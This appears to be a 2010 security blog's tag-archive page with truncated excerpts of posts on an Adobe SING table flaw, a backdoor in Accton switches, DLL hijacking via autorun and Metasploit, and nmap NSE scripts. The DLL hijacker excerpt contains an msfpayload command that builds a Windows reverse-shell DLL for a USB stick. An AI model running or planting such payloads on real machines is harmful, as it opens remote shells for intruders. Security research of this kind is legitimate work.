So, I’ve come across a lot more information regarding the no-longer-0day Adobe vulnerability (oh, wait, that’s right.. there have been like, 12 in the last 30 days.. I’m referring just to the SING table one). Anyway, a penetration testing company named Ramz Afzar has released an unofficial patch to fix the Adobe vulnerability, because apparently [...]
Posts Tagged ‘vulnerability’
Really, Adobe?
Posted: 20th September 2010 by Matt in code, hacks, news, securityTags: 0day, Acrobat, Adobe, cooltype, corporate, dll, exploitation, information, own, PDF, penetration, SING, software, strncat, SumatraPDF, vulnerability, Xpdf
9
An Open Letter to Microsoft
Posted: 8th September 2010 by Matt in news, securityTags: Apache, Blaster, Boink, Bonk, code, Code Red, company, computer, Conficker, crash, denial of service, denial of service attack, exploits, Frag, IIS, ILOVEYOU, irc, Land, Linux, Microsoft, MyDoom, Nestea, NewTear, Nimda, Sandmind, Sasser, Sircam, Slammer, SoBig, Sping, spyware, SQL, TearDrop, vulnerability, vulnerable, Windows, WinNuke, worm
Dear Microsoft, I have watched you develop as a company, starting with Windows 3.1. It was most peoples first experience with a PC and considering that there was really no other marketed OS (Linux was brand new and not really totally “usable” yet. I ran it, but it was not for the faint of heart. [...]
Backdoor Password in Accton Based Switches
Posted: 2nd September 2010 by Matt in code, hacks, securityTags: Accton, Accton-based, backdoor, concept, Dell PowerConnect, EdgeCore, Edwin Eefting, Erik Smit, Erwin Drent, exploit, firmware, Foundry, passwords, perl, PoC, proof, SNMP, vulnerability
This just came across and it’s pretty interesting. I haven’t heard of/seen this before, so I figured I’d repost it here. I don’t usually like to regurgitate stuff, but if I have nothing to write myself and I come across something that I consider to be valuable, interesting, insightful, or whatever, I will. [BEGIN REGURGITATION [...]
Autorun DLL Hijacker (USB stick)
Posted: 26th August 2010 by Matt in code, hacks, securityTags: 0day, autorun, dll, exploit, hack, hijacker, Hijacking, network security audit, USB, vulnerability
I decided that it might be useful to be able to utilize DLL hijacking with Autorun.. here’s the outcome. # msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll Created by msfpayload (http://www.metasploit.com). Payload: windows/shell/reverse_tcp Length: 290 Options: LHOST=192.168.0.58
Video Demo of DLL Hijacking Attack.
Posted: 26th August 2010 by Matt in hacks, securityTags: 0day, address book, dll, exploit, hack, hijack, Microsoft, vulnerability, webdav_dll_hijacker
This is a quick video demonstrating the “webdav_dll_hijacker” Metasploit module. In this video, I target Windows Address Book (.vcf/wab32res.dll) (Best viewed in fullscreen mode in 480p or higher. Youtube absolutely killed the video quality. Thanks Youtube!) Just to make sure this is clear.. the window on the left side of the screen is my Linux [...]
Favorite nmap NSE scripts
Posted: 25th August 2010 by Matt in code, hacks, securityTags: Administrator, attack, brute force, dns-zone-transfer, dnszonetransfer, enum, Enumeration, hack, http-enum, MS08-067, nmap, nse, nsedoc, scripts, smb-brute, smb-check-vulns, smb-enum-users, snmp-netstat, snmp-processes, snmp-win32-services, snmp-win32-shares, snmp-win32-users, transfer, vulnerability
I cannot say enough good things about NSE (Nmap Scripting Engine). I’ve written a couple of posts about it and why I find it so useful, but in this post I’m going to cover some of my favorite scripts that come with the most recent Nmap release (5.35 DC1 (The DefCon release.. oooh. ). The [...]